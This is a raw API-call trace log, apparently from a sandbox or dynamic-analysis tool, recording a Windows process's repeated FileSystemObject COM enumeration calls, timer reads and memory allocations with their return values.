	[0046.701] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.701] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e6e0) returned 0x0
	[0046.701] FileSystemObject:IUnknown:Release (This=0x42e6e0) returned 0x1
	[0046.701] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.701] FileSystemObject:IUnknown:Release (This=0x42e6e0) returned 0x0
	[0046.702] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.702] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e6e0) returned 0x0
	[0046.702] FileSystemObject:IUnknown:Release (This=0x42e6e0) returned 0x1
	[0046.702] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.703] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec38, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.703] FileSystemObject:IUnknown:Release (This=0x42e6e0) returned 0x0
	[0046.704] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.706] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.706] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.707] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.707] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.707] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.708] GetTickCount () returned 0x1144f1a
	[0046.708] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.708] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.708] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.708] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.710] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec38, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.710] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.711] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.714] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.714] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e6e0) returned 0x0
	[0046.714] FileSystemObject:IUnknown:Release (This=0x42e6e0) returned 0x1
	[0046.714] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.714] FileSystemObject:IUnknown:Release (This=0x42e6e0) returned 0x0
	[0046.715] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.715] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e6e0) returned 0x0
	[0046.715] FileSystemObject:IUnknown:Release (This=0x42e6e0) returned 0x1
	[0046.715] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.716] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec38, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.716] FileSystemObject:IUnknown:Release (This=0x42e6e0) returned 0x0
	[0046.716] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.720] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.720] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.720] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.720] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.720] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.721] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.721] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e9e0) returned 0x0
	[0046.721] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.721] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.722] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec38, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.722] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.722] GetTickCount () returned 0x1144f1a
	[0046.722] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6b0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.724] FileSystemObject:IUnknown:Release (This=0x42e6b0) returned 0x0
	[0046.725] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d198 | out: ppvObject=0x26d198*=0x0) returned 0x80004002
	[0046.725] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e9e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d400 | out: ppvObject=0x26d400*=0x42e9e0) returned 0x0
	[0046.725] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x1
	[0046.725] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.726] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e718, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.727] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec38, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.728] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e718, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.728] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec38, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.729] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42e718, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.730] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e9e0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ec38, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.730] FileSystemObject:IUnknown:Release (This=0x42e9e0) returned 0x0
	[0046.730] free (_Block=0x42eb40) 
	[0046.730] free (_Block=0x3cd730) 
	[0046.730] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0046.730] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0046.731] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e680, celt=0x1, rgvar=0x26dae8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.736] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d198 | out: ppvObject=0x26d198*=0x0) returned 0x80004002
	[0046.736] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d400 | out: ppvObject=0x26d400*=0x42e6e0) returned 0x0
	[0046.737] FileSystemObject:IUnknown:Release (This=0x42e6e0) returned 0x1
	[0046.737] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6e0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.737] FileSystemObject:IUnknown:Release (This=0x42e6e0) returned 0x0
	[0046.738] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6e0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d198 | out: ppvObject=0x26d198*=0x0) returned 0x80004002
	[0046.738] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6e0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d400 | out: ppvObject=0x26d400*=0x42e6e0) returned 0x0
	[0046.738] FileSystemObject:IUnknown:Release (This=0x42e6e0) returned 0x1
	[0046.738] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6e0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.738] FileSystemObject:IUnknown:Release (This=0x42e6e0) returned 0x0
	[0046.739] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e680, celt=0x1, rgvar=0x26dae8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.740] GetTickCount () returned 0x1144f39
	[0046.742] longjmp () 
	[0046.746] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e680, celt=0x1, rgvar=0x26dae8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.750] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6d0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d198 | out: ppvObject=0x26d198*=0x0) returned 0x80004002
	[0046.750] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e6d0, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d400 | out: ppvObject=0x26d400*=0x42e6d0) returned 0x0
	[0046.750] FileSystemObject:IUnknown:Release (This=0x42e6d0) returned 0x1
	[0046.750] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e6d0, celt=0x1, rgvar=0x26d398*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.751] GetCurrentThreadId () returned 0x9a8
	[0046.751] GetCurrentThreadId () returned 0x9a8
	[0046.751] ??2@YAPEAX_K@Z () returned 0x42e930
	[0046.751] malloc (_Size=0x80) returned 0x3c8430
	[0046.758] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e730, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca48 | out: ppvObject=0x26ca48*=0x0) returned 0x80004002
	[0046.759] FileSystemObject:IUnknown:QueryInterface (in: This=0x42e730, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccb0 | out: ppvObject=0x26ccb0*=0x42e730) returned 0x0
	[0046.759] FileSystemObject:IUnknown:Release (This=0x42e730) returned 0x1
	[0046.759] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.761] GetCurrentThreadId () returned 0x9a8
	[0046.761] GetCurrentThreadId () returned 0x9a8
	[0046.761] ??2@YAPEAX_K@Z () returned 0x42ea60
	[0046.761] malloc (_Size=0x80) returned 0x3c85e0
	[0046.764] GetTickCount () returned 0x1144f49
	[0046.764] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.764] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x42eb60) returned 0x0
	[0046.764] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x1
	[0046.764] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.765] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x0
	[0046.765] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.765] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x42eb60) returned 0x0
	[0046.766] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x1
	[0046.766] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.768] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.769] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed18, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.771] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.772] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed18, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.773] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x0
	[0046.773] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.779] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.779] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x42eb60) returned 0x0
	[0046.779] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x1
	[0046.779] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.781] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x0
	[0046.782] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.782] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x42eb60) returned 0x0
	[0046.782] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x1
	[0046.782] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.784] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.786] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed28, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.788] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.789] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed28, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.789] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x0
	[0046.789] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.790] GetTickCount () returned 0x1144f68
